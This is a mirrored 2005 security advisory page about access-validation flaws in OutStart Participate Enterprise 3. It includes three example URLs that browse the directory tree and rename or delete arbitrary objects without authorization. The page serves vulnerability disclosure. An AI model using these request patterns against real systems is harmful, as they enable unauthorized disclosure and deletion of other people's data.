OutStart Participate Enterprise 3 – Multiple Access Validation Vulnerabilities

OutStart Participate Enterprise 3 – Multiple Access Validation Vulnerabilities

漏洞ID 1054954 漏洞类型
发布时间 2005-03-08 更新时间 2005-03-08
图片[1]-OutStart Participate Enterprise 3 – Multiple Access Validation Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-OutStart Participate Enterprise 3 – Multiple Access Validation Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 JSP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25198
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12752/info

Participate Enterprise is reported prone to multiple access validation vulnerabilities. These issues may allow remote attackers to disclose sensitive information and corrupt and delete data that can ultimately lead to a denial of service condition.

The following specific issues were identified:

An attacker can browse the directory tree and disclose sensitive information.

An attacker can rename arbitrary objects.

An attacker can delete arbitrary objects as well.

All versions of Participate Enterprise are considered vulnerable at the moment.

To browse the directory tree:
http://www.example.com/pe/repository/displaynavigator.jsp?rootFolder=101

To rename an object:
http://www.example.com/pe/repository/include/renamepopup.jsp?selectedObject=101

To delete an object:
http://www.example.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101

相关推荐: LANChat Pro Revival UDP Processing Remote Denial Of Service Vulnerability

LANChat Pro Revival UDP Processing Remote Denial Of Service Vulnerability 漏洞ID 1097201 漏洞类型 Failure to Handle Exceptional Conditio…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享